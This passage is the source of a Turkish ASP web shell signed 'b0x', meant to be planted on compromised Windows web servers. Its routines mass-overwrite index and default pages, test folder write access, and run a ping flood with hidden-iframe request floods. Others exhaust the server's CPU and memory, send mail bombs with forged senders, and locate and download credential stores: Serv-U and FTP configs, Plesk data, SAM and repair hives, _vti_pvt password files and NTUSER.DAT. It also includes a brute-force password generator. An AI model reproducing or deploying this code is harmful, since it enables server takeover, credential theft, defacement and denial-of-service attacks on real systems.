  522. Call MassCreater(fastb0x&"\index.htm",ej)
  523. Call MassCreater(fastb0x&"\index.asp",ej)
  524. Call MassCreater(fastb0x&"\index.cfm",ej)
  525. Call MassCreater(fastb0x&"\index.php",ej)
  526. Call MassCreater(fastb0x&"\default.html",ej)
  527. Call MassCreater(fastb0x&"\default.htm",ej)
  528. Call MassCreater(fastb0x&"\default.asp",ej)
  529. Call MassCreater(fastb0x&"\default.cfm",ej)
  530. Call MassCreater(fastb0x&"\default.php",ej)
  531. end if
  532. else
  533. if hash9 = "copy" then
  534. MassCopier(fastb0x&"\"&inject1)
  535. else
  536. Call MassCreater(fastb0x&"\"&inject1,ej)
  537. end if
  538. end if
  539.  
  540. a = Replace(FilePath&"?Path="&fastb0x&"&Time="&time,"\","/")
  541. If Err.Number = 0 Then
  542. response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastb0x&" </a><font color=#C6FCBE> OK !! <font class=""k1"">?</font></td></tr></table>"
  543. else
  544. response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastb0x&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">?</font></td></tr></table>"
  545. end if
  546. Err.Number = 0
  547. Response.Flush
  548.  
  549. if islem = "brute" then
  550. Call MassAttack(f1.path&"\",ej,svk)
  551. end if
  552. Next
  553. end sub
  554.  
  555. Sub tester(yer)
  556. on error resume next
  557. Set f = b0x.GetFolder(yer)
  558. Set fc = f.SubFolders
  559. For Each f1 In fc
  560.  
  561. a = Replace(FilePath&"?Path="&f1.path&"&Time="&time,"\","/")
  562. response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&f1.path&" </a> "
  563. Response.Flush
  564.  
  565. Err.Number = 0
  566. on error resume next
  567. Set f = b0x.GetFolder(f1.path)
  568. if Err.Number <> 0 then
  569. response.write "&nbsp;<b><font color=#FBE1D7>Reading :</font></b> <font color=#FE7A84 class=""k1"">?</font>&nbsp;"
  570. else
  571. response.write "&nbsp;<b><font color=#FAFEDE>Reading :</font></b> <font color=#C6FCBE class=""k1"">?</font>&nbsp;"
  572. end if
  573. set f = nothing
  574. Err.Number = 0
  575. Response.Flush
  576.  
  577. on error resume next
  578. Set MyFile = b0x.CreateTextFile(f1.path & "test.b0x", True)
  579. MyFile.write " b0x Was Here "
  580. set MyFile = Nothing
  581. if Err.Number <> 0 then
  582. response.write "&nbsp;<b><font color=#FBE1D7>Writing :</font></b> <font color=#FE7A84 class=""k1"">?</font>&nbsp;"
  583. else
  584. response.write "&nbsp;<b><font color=#FAFEDE>Writing :</font></b> <font color=#C6FCBE class=""k1"">?</font>&nbsp;"
  585. end if
  586. set f = nothing
  587. Err.Number = 0
  588. Response.Flush
  589.  
  590. on error resume next
  591. b0x.DeleteFile f1.path & "test.b0x",true
  592. if Err.Number <> 0 then
  593. response.write "&nbsp;<b><font color=#FBE1D7>Deleting :</font></b> <font color=#FE7A84 class=""k1"">?</font>&nbsp;"
  594. else
  595. response.write "&nbsp;<b><font color=#FAFEDE>Deleting :</font></b> <font color=#C6FCBE class=""k1"">?</font>&nbsp;"
  596. end if
  597. set f = nothing
  598. Err.Number = 0
  599. Response.Flush
  600.  
  601. response.write "</td></tr></table>"
  602. Response.Flush
  603.  
  604. Call tester(f1.path)
  605.  
  606. Next
  607. end sub
  608.  
  609. Sub arama(yer)
  610. on error resume next
  611. Set f = b0x.GetFolder(yer)
  612. Set fc = f.SubFolders
  613. For Each f1 In fc
  614.  
  615. Set f2 = b0x.GetFolder(f1.path)
  616. Set fc2 = f2.Files
  617. For Each f12 In fc2
  618.  
  619. if InStr(Ucase(f12.name),Ucase(hacked)) > 0 then
  620. downStr = "<table align=""center""><tr><td align=""center"" class=""kbrtm""><font class=""k2""><a href='"&FilePath&"?mode=6&file="&f12.path&"&Path="&Path&"&Time="&time&"'> ? </a></font>"
  621. if Ucase(hacked)="MDB" then
  622. Response.Write downStr&"<font class=""k1"" ><a href='"&FilePath&"?mode=5&Path="&Path&"&del="&f12.path&"&Time="&time&"'> ? </a></font> - <a href='"&dosyapath&"?mode=13&file="&f12.path&"&Path="&Path&"&Time="&time&"'>"&f12.path&" ["&f12.size&"]"&"</a></b><br></td></tr></table>"
  623. i=i+1
  624. else
  625. Response.Write downStr&"<font class=""k1""><a href='"&FilePath&"?mode=5&Path="&Path&"&del="&f12.path&"&Time="&time&"'> ? </a><a href='"&FilePath&"?mode=10&file="&f12.path&"&Path="&Path&"&Time="&time&"'> ! </a></font> - <a href='"&dosyapath&"?mode=9&file="&f12.path&"&Path="&Path&"&Time="&time&"'>"&f12.path&" [<font color=yellow>"&f12.size&"</font>]"&"</a></b><br></td></tr></table>"
  626. i=i+1
  627. end if
  628. end if
  629. Response.Flush
  630.  
  631. next
  632. set f2 = nothing
  633. set fc2 = nothing
  634.  
  635. Call arama(f1.path)
  636.  
  637. next
  638. set f = nothing
  639. set fc = nothing
  640.  
  641. end sub
  642.  
  643. Sub Ping_Bomb_b0x(b0xsite,b0xpings,b0xtimeout,b0xbyte)
  644. '/// by b0x. ?zel mod?ller ekledim =). Ne Mutlu TURKUM D?YENE.
  645. noattack = 1
  646. bonus = 0
  647. If b0xpings = "" Then b0xpings = 4
  648. If b0xpings = 0 Then b0xpings = 4
  649. If b0xtimeout = "" Then b0xtimeout = 750
  650. If InStr(b0xsite,"savsak") > 0 or InStr(b0xsite,"yagmurlu") or InStr(b0xsite,"gov.tr") > 0 then noattack = 0
  651. If InStr(b0xsite,"cyber") > 0 or InStr(b0xsite,"tahri") > 0 or InStr(b0xsite,"hack") > 0 or InStr(b0xsite,"team") > 0 then bonus = 1
  652.  
  653. response.write "<textarea style='width:100%;height:350;' >"
  654. if noattack = 1 then
  655. if bonus = 1 then
  656. b0xpings = b0xpings * 20
  657. response.write "Ekstra *20 Bonus kazand?n. "
  658. end if
  659.  
  660. Set Sh = CreateObject("WScript.Shell")
  661. if b0xbyte = "" then
  662. Set ExCmd = Sh.Exec("ping -n " & b0xpings _
  663. & " -w " & b0xtimeout & " " & b0xsite)
  664. else
  665. Set ExCmd = Sh.Exec("ping -n " & b0xpings _
  666. & " -w " & b0xtimeout & " " & b0xsite & " -l " & b0xbyte)
  667. end if
  668. depola = ExCmd.StdOut.ReadAll
  669. response.write depola
  670. Select Case InStr(ExCmd.StdOut.Readall,"TTL=")
  671. Case 0 IsConnectable = False
  672. Case Else IsConnectable = True
  673. End Select
  674. else
  675. response.write "Tasvip Etmedi?imiz Bir siteye Sald?r? yap?yorsun. Tekrarlama K?t? olur senin i?in. CIZZZ =) euheu by b0x "
  676. response.write "Bu b0x sahibine, GOv.TR ve Com.TR sitelere kar?? Koruma ger?ekle?tirildi. TURK TURK ? VURMAZ.. Kalle?lik yapma by b0x "
  677. response.cookies("b0x") = "1"
  678. response.cookies("b0x").expires = now + 365
  679. count=0
  680. end if
  681. response.write "</textarea>"
  682.  
  683. End Sub
  684.  
  685. Sub Somurgen(filex,urlx)
  686. for i=0 to CInt(filex)
  687. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"&i&". Robot Ba?land?..</td></tr></table>"
  688. response.Write "<iframe style='width:0; height:0' src='"&urlx&"'></iframe>"
  689. next
  690. End Sub
  691.  
  692. Sub Ram_Cpu
  693. on error resume next
  694. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b> RAM & CPU FUcker for SERVER 0 </b></td></tr></table>"
  695. response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> ZARAR verme MEkanizmas? Devrede... </td></tr></table>"
  696. response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> Durdurmak i?in Pencereyi kapat. Her 2 Saniyede bir 3 program a??l?yor...</td></tr></table>"
  697. response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <b>by b0x</b></td></tr></table>"
  698. response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=1'></iframe>"
  699. response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=2'></iframe>"
  700. response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=3'></iframe>"
  701. response.write "<META http-equiv=refresh content=2;URL='"&FilePath&"?mode=31&file=1'>"
  702. response.flush
  703. end Sub
  704.  
  705. function TextYarat(intLen)
  706. str=""
  707. Randomize
  708. for i=1 to intLen
  709. str=str & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
  710. next
  711. TextYarat=str
  712. end function
  713.  
  714. function MailSec()
  715. dim strNewText,i
  716. str=""
  717. Randomize
  718. mail = mail_array(round(rnd()*4))
  719. uzanti = uzanti_array(round(rnd()*6))
  720. str = "@"& mail &"."& uzanti
  721. MailSec = str
  722. end function
  723.  
  724. function MailKorumasi(mailx)
  725. MailKorumasi = 0
  726. for i=0 to 9
  727. If Instr(UCASE(mailx), yasak_array(i)) Then
  728. MailKorumasi = 1
  729. end if
  730. next
  731. end function
  732.  
  733. Function MailYarat()
  734. MailYarat = TextYarat(8) & MailSec()
  735. end function
  736.  
  737. Function TextYarat2()
  738. TextYarat2 = TextYarat(200)
  739. end function
  740.  
  741. Function BaslikYarat()
  742. BaslikYarat = TextYarat(10)
  743. end function
  744.  
  745. Sub MailBomber_by_b0x(alicix)
  746. response.cookies("bilesen") = "1"
  747. on error resume next
  748. Set mailObj = Server.CreateObject("CDONTS.NewMail")
  749. mailObj.From = MailYarat()
  750. mailObj.To = alicix
  751. mailObj.Subject = BaslikYarat()
  752. mailObj.Body = TextYarat2()
  753. mailObj.Send
  754. Set mailObj = Nothing
  755. if err <> 0 then
  756. on error resume next
  757. Set mailObj = Server.CreateObject("CDO.Message")
  758. mailObj.From = MailYarat()
  759. mailObj.To = alicix
  760. mailObj.Subject = BaslikYarat()
  761. mailObj.TextBody = TextYarat2()
  762. mailObj.Send
  763. Set mailObj = Nothing
  764. if err <> 0 then
  765. response.cookies("bilesen") = "0"
  766. end if
  767. end if
  768. End Sub
  769.  
  770. Sub yazorta(yazx)
  771. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"
  772. End Sub
  773. Sub yazsol(yazx)
  774. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"
  775. End Sub
  776. Sub yazortaa(yazx)
  777. response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"
  778. End Sub
  779. Sub yazsoll(yazx)
  780. response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"
  781. End Sub
  782.  
  783. Function OS()
  784. on error resume next
  785. strComputer = "."
  786. Set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  787. Set colItems = objWMI.ExecQuery("Select * from Win32_OperatingSystem",,48)
  788. For Each objItem in colItems
  789. VerBig = Left(objItem.Version,3)
  790. Next
  791. Select Case VerBig
  792. Case "5.0" OSystem = "W2K"
  793. Case "5.1" OSystem = "XP"
  794. Case "5.2" OSystem = "Windows 2003"
  795. Case "4.0" OSystem = "NT 4.0**"
  796. Case Else OSystem = "Unknown - probably Win 9x"
  797. End Select
  798. OS = OSystem
  799. End Function
  800.  
  801. Sub FolderExistx(yer)
  802. if b0x.FolderExists(yer) then
  803. yazorta("<font class=""k1""><a title="" Dizini Copy/Move File?? "" href='"&FilePath&"?mode=2&Path="&yer&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Dizini Sil "" href='"&FilePath&"?mode=4&Path="&yer&"&del="&yer&"&Time="&time&"'>?</a> 1</font><font size=2><b><a title="" Dizinin i?ine Gir "" href='"&FilePath&"?Path="&yer&"&Time="&time&"'> "&yer&"</a></b>")
  804. end if
  805. End Sub
  806.  
  807. Sub b0xServuRemote()
  808. j=0
  809. servu = array("C:\Program Files\base.ini","C:\base.ini","C:\Program Files\Serv-U\base.ini","C:\Program Files\Serv-U\ServUAdmin.ini","C:\Program Files\Serv-U\SERV-U.ini","C:\Program Files\Serv-U\ServUDaemon.ini","C:\Program Files\SERV-U.ini","C:\SERV-U.ini","C:\Program Files\ServUDaemon.ini","C:\ServUDaemon.ini","C:\Program Files\WS_FTP.ini","C:\WS_FTP.ini","C:\Program Files\WS_FTP\WS_FTP.ini","C:/Program Files/Gene6 FTP Server/RemoteAdmin/remote.ini","C:/users.txt","D:/users.txt","E:/users.txt")
  810. for i=0 to 16
  811. if b0x.FileExists(servu(i)) then
  812. downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>?</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&servu(i)&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Copy/Move File?? "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
  813. yazorta("<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&Path="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>?± <a title="" Dosyay? Editlemek i?in T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font>")
  814. j=j+1
  815. end if
  816. next
  817. if j = 0 then
  818. yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Remote olarak Sonu? bulunamad?. Geli?mi? aramay? se?iniz. <font face=Wingdings size=5>N</font> </font>")
  819. end if
  820. servufolder = array("C:\Program Files\Serv-U","C:/Program Files/Gene6 FTP Server/RemoteAdmin","C:/Program Files/Gene6 FTP Server/Accounts/Helm FTP Users/users")
  821. for i=0 to 2
  822. FolderExistx(servufolder(i))
  823. next
  824. End Sub
  825.  
  826. Sub b0xPleskRemote()
  827. j=0
  828. plesk = array("c:/Program Files/SWsoft/Plesk/MySQL/Data/mysql","c:/Program Files/SWsoft/Plesk","c:/Program Files/SWsoft/Plesk/MySQL/Data/psa","c:/Program Files/SWsoft/Plesk/Databases/MySQL/Data/mysql","c:\Program Files\swsoft\autsav.sav")
  829. for i=0 to 3
  830. if b0x.FolderExists(plesk(i)) then
  831. yazorta("<font class=""k1""><a title="" Dizini Copy/Move File?? "" href='"&FilePath&"?mode=2&Path="&plesk(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Dizini Sil "" href='"&FilePath&"?mode=4&Path="&plesk(i)&"&del="&plesk(i)&"&Time="&time&"'>?</a> 1</font><font size=2><b><a title="" Dizinin i?ine Gir "" href='"&FilePath&"?Path="&plesk(i)&"&Time="&time&"'>"&plesk(i)&"</a></b>")
  832. j=j+1
  833. end if
  834. next
  835. if j = 0 then
  836. yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&plesk(0)&" ve "&plesk(1)&" dizinleri bulunamad?. <font face=Wingdings size=5>N</font> </font>")
  837. end if
  838. if b0x.FileExists(plesk(4)) then
  839. downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>?</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&servu(i)&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
  840. yazorta("<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&Path="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>?± <a title="" Dosyay? Editlemek i?in T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font>")
  841. else
  842. yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Plesk'in Autsav.sav Dosyas? bulunamad?. <font face=Wingdings size=5>N</font> </font>")
  843. end if
  844. End Sub
  845.  
  846. Sub b0xSam()
  847. Err.Number=0
  848. on error resume next
  849. Set MyFile = b0x.CreateTextFile("C:config\test.b0x", True)
  850. MyFile.write " b0x Was Here... =) "
  851. set MyFile = Nothing
  852. if Err.Number <> 0 then
  853. response.write "<center>&nbsp;<b><font color=#FBE1D7>Writing :</font></b> <font color=#FE7A84 class=""k1"">?</font>&nbsp;"
  854. else
  855. response.write "<center>&nbsp;<b><font color=#FAFEDE>Writing :</font></b> <font color=#C6FCBE class=""k1"">?</font>&nbsp;"
  856. end if
  857. Err.Number=0
  858. on error resume next
  859. b0x.DeleteFile "C:config\test.b0x",true
  860. if Err.Number <> 0 then
  861. response.write "&nbsp;<b><font color=#FBE1D7>Deleting :</font></b> <font color=#FE7A84 class=""k1"">?</font>&nbsp;</center>"
  862. else
  863. response.write "&nbsp;<b><font color=#FAFEDE>Deleting :</font></b> <font color=#C6FCBE class=""k1"">?</font>&nbsp;</center>"
  864. end if
  865. on error resume next
  866. url = "C:config\"
  867. Set f = b0x.GetFolder(url)
  868. if err <> 0 then
  869. url = "C:\WINDOWS\system32\config\"
  870. Set f = b0x.GetFolder(url)
  871. end if
  872.  
  873. Set fc = f.Files
  874. For Each f1 In fc
  875. downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&url&"&del="&url&""&f1.name&"&Time="&time&"'>?</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&Path="&url&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
  876. yazorta("<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&Path="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>?± <a title="" Dosyay? Editlemek i?in T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&Path="&url&"'>!</a>"&downStr&"</font>")
  877. Next
  878. end Sub
  879.  
  880. Sub b0xVti_Pvt()
  881. j=0
  882. local = request.servervariables("APPL_PHYSICAL_PATH")
  883. vti = array(""&local&"\_vti_pvt\access.cnf",""&local&"\..\_vti_pvt\access.cnf",""&local&"\..\..\_vti_pvt\access.cnf",""&local&"\..\..\..\_vti_pvt\access.cnf",""&local&"\_vti_pvt\postinfo.html",""&local&"\..\_vti_pvt\postinfo.html",""&local&"\..\..\_vti_pvt\postinfo.html",""&local&"\..\..\..\_vti_pvt\postinfo.html",""&local&"\vti_pvt/service.pwd",""&local&"\..\vti_pvt/service.pwd",""&local&"\..\..\vti_pvt/service.pwd",""&local&"\..\..\..\vti_pvt/service.pwd")
  884. for i=0 to 11
  885. if b0x.FileExists(vti(i)) then
  886. downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&vti(i)&"&Time="&time&"'>?</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&vti(i)&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&vti(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&vti(i)&"&islem="&vti(i)&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
  887. yazorta("<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&vti(i)&"&Path="&FolderPath&"&Time="&time&"'>"&vti(i)&"</a></b> <font face=wingdings size=4>?± <a title="" Dosyay? Editlemek i?in T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&vti(i)&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font>")
  888. j=j+1
  889. end if
  890. next
  891. if j = 0 then
  892. yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonu? bulunamad?. Daha geni? Arama yap?n by b0x <font face=Wingdings size=5>N</font> </font>")
  893. end if
  894. end sub
  895.  
  896. Sub b0xNTUser(oturum)
  897. j=0
  898. ntuser = array("c:\documents and settings\"&oturum&"\NTUSER.DAT","c:\documents and settings\Administrator\NTUSER.DAT","c:\documents and settings\"&oturum&"\ntuser.dat.log","c:\documents and settings\Administrator\ntuser.dat.log","c:\documents and settings\"&oturum&"\ntuser.ini","c:\documents and settings\Administrator\ntuser.ini")
  899. for i=0 to 5
  900. if b0x.FileExists(ntuser(i)) then
  901. downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&ntuser(i)&"&Time="&time&"'>?</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&ntuser(i)&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&ntuser(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&ntuser(i)&"&islem="&ntuser(i)&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
  902. yazorta("<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&ntuser(i)&"&Path="&FolderPath&"&Time="&time&"'>"&ntuser(i)&"</a></b> <font face=wingdings size=4>?± <a title="" Dosyay? Editlemek i?in T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&ntuser(i)&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font>")
  903. j=j+1
  904. end if
  905. next
  906. if j = 0 then
  907. yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonu? bulunamad?. Daha geni? Arama yap?n by b0x <font face=Wingdings size=5>N</font> </font>")
  908. end if
  909. end sub
  910.  
  911. Sub b0xRepair()
  912. Err.Number=0
  913. on error resume next
  914. Set MyFile = b0x.CreateTextFile("c:..\repair\test.b0x", True)
  915. MyFile.write " b0x Was Here... =) "
  916. set MyFile = Nothing
  917. if Err.Number <> 0 then
  918. response.write "<center>&nbsp;<b><font color=#FBE1D7>Writing :</font></b> <font color=#FE7A84 class=""k1"">?</font>&nbsp;"
  919. else
  920. response.write "<center>&nbsp;<b><font color=#FAFEDE>Writing :</font></b> <font color=#C6FCBE class=""k1"">?</font>&nbsp;"
  921. end if
  922. Err.Number=0
  923. on error resume next
  924. b0x.DeleteFile "c:..\repair\test.b0x",true
  925. if Err.Number <> 0 then
  926. response.write "&nbsp;<b><font color=#FBE1D7>Deleting :</font></b> <font color=#FE7A84 class=""k1"">?</font>&nbsp;</center>"
  927. else
  928. response.write "&nbsp;<b><font color=#FAFEDE>Deleting :</font></b> <font color=#C6FCBE class=""k1"">?</font>&nbsp;</center>"
  929. end if
  930. on error resume next
  931. url = "c:..\repair\"
  932. Set f = b0x.GetFolder(url)
  933. if err <> 0 then
  934. url = "C:\WINDOWS\repair\"
  935. Set f = b0x.GetFolder(url)
  936. end if
  937.  
  938. Set fc = f.Files
  939. For Each f1 In fc
  940. downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&url&"&del="&url&""&f1.name&"&Time="&time&"'>?</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&Path="&url&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
  941. yazorta("<a title="" ??ini Gomek i?in T?kla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&Path="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>?± <a title="" Dosyay? Editlemek i?in T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&Path="&url&"'>!</a>"&downStr&"</font>")
  942. Next
  943. end Sub
  944.  
  945. Function kodolustur(aralik)
  946. ' belirtitiim aral?kda kod olu?tuuyorurum. 01#01#01#01# ba?lang?? ii?in by b0x
  947. dim coding
  948. coding = ""
  949. for i=1 to CInt(aralik)
  950. coding = coding + "01#"
  951. next
  952. kodolustur = coding
  953. End Function
  954.  
  955. Function diziolustur()
  956. ' Se?ilen Charset leri burda birle?tiriyorum by b0x
  957. Dim dizi
  958. dizi=""
  959. if not k1 = "" then dizi = dizi & karakter1
  960. if not k2 = "" then dizi = dizi & karakter2
  961. if not k3 = "" then dizi = dizi & karakter3
  962. if not k4 = "" then dizi = dizi & karakter4
  963. diziolustur = dizi
  964. End Function
  965.  
  966. Function Sifreyarat(codex,aralik,dizix)
  967. ' Stirng kodunu sa?dan ??z?mleyerek ?ifre yarat?yor by b0x
  968. dim hash
  969. dim sifre
  970. hash=""
  971. sifre=""
  972. i=CInt(aralik)
  973. Do While i>0
  974. hash = CInt(Mid(codex,((i-1)*3)+1,2)) ' Sa?dan say?lar? al?yor.
  975. sifre = Mid(dizix,hash,1) & sifre
  976. i=i-1
  977. Loop
  978. Sifreyarat = sifre
  979. End Function
  980.  
  981. Function SonrakiAdim(codex,aralik,dizix)
  982. ' sonraki ad?ma haz?rl?k coded Developed By TurkisH-RuleZ
  983. Dim hash
  984. hash = ""
  985. increment=0
  986. goup=0
  987. hashing = ""
  988. i=CInt(aralik)
  989. Do While i>0
  990. hash = CInt(Mid(codex,((i-1)*3)+1,2)) ' Sa?dan say?lar? al?yor.
  991. ' Carry out ? di?eirne giri? yap increment the next one
  992. if hash => Len(dizix) then
  993. increment = 1
  994. hash = 1
  995. else if increment = 1 then
  996. hash = hash+1
  997. increment = 0
  998. end if
  999. end if
  1000. ' e?er ara1 hanelki ?ifreleme bitti ise di?eirne ?kams? gerek ara1++
  1001. if i = 1 AND hash>= Len(dizix)-1 then goup=1
  1002. ' Brute biti?ini g?steriiyorum.
  1003. if i = CInt(aralik) AND hash>= Len(dizix) AND ara1 = ara2 then getend=1 ''' BRUTE ??k??? bitti?ini anal?yorumm GETEND =1 !!!!!!!!!!!!!
  1004. ' hash i bir sonraki ad?ma haz?rla
  1005. if i = CInt(aralik) then hash = hash + 1
  1006. 'yeni hash numaras? olu?tur
  1007. if hash <10 then hash = "0" & hash
  1008. hashing = hash &"#" & hashing
  1009. i=i-1
  1010. Loop
  1011. coding = hashing
  1012. ' e?erki goup =1 then hane atla ve yeni stireg ol?utur
  1013. if goup = 1 then
  1014. coding = ""
  1015. ara1 = CInt(aralik) + 1
  1016. for j=1 to ara1
  1017. coding = coding + "01#"
  1018. next
  1019. end if
  1020. SonrakiAdim = coding
  1021. End Function
  1022.  
  1023. Sub Cookyaz(str1,str2,str3)
  1024. if not str3 = "" then
  1025. response.cookies(str1)("str2") = str3
  1026. response.cookies(str1).expires = now+100
  1027. session("say") = CInt(session("say")) + 1
  1028. end if
  1029. End Sub
  1030. Sub HashFounded(str1,str2)
  1031. if not request.cookies(str1)("sifre") = "" then
  1032. yazsol("<b>Bulundu: "&request.cookies(str1)(str2)&" ->> "&request.cookies(str1)("sifre")&" </b>")
  1033. inject3 = CInt(inject3) + 1
  1034. end if
  1035. End Sub
  1036. Sub hashyes(str1,str2,md5x,pwd)
  1037. if not request.cookies(str1)(str2) = "" AND UCASE(request.cookies(str1)(str2)) = md5x then
  1038. yazsol("BULDUuuuuuuuuuuuuuuu " & pwd & " - " & request.cookies(str1)(str2)&"")
  1039. response.cookies(str1)("sifre") = pwd
  1040. end if
  1041. End Sub
  1042. '************************* ZORUNLU UPLOAD i?in GEREKLi =(( **********************************************************************************************
  1043. Class clsUpload
  1044. Private mbinData
  1045. Private mlngChunkIndex
  1046. Private mlngBytesReceived
  1047. Private mstrDelimiter
  1048. Private CR
  1049. Private LF
  1050. Private CRLF
  1051. Private mobjFieldAry()
  1052. Private mlngCount
  1053.  
  1054. Private Sub RequestData
  1055. Dim llngLength
  1056. mlngBytesReceived = Request.TotalBytes
  1057. mbinData = Request.BinaryRead(mlngBytesReceived)
  1058. End Sub
  1059.  
